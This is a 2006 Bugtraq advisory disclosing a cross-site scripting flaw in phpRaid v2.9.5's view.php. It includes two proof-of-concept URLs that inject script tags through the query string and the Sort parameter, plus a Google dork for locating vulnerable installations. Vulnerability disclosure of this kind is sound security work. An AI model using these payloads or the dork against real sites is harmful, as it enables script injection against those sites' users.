[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
phpRaid "view.php" XSS Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: phpRaid "view.php" XSS Vulnerability
- From: "TeufeL Online" <teufel@xxxxxxxxxxx>
- Date: Fri, 19 May 2006 11:06:30 +0000
phpRaid "view.php" XSS Vulnerability
Script : phpRaid
Script Website : http://www.spiffyjr.com/
Version : phpRaid v2.9.5
This Xss Works On phpRaid
Exploit ;
1-)
Http://www.example.com/phpRaid/view.php?<script>alert('Xss%20Vulnerability');</script>
2-)
Http://www.example.com/phpRaid/view.php?mode=view&raid_id=6&Sort=><script>var%20Xss_Vulnerability=31033031;alert(Xss_Vulnerability);</script>
Google Dorks : inurl:"phpRaid"
TeufeL // Netkabus.Com Research And Develop Group
_________________________________________________________________
Real-time chat with your friends - Free download - MSN Messenger
http://messenger.msn.com/?mkt=tr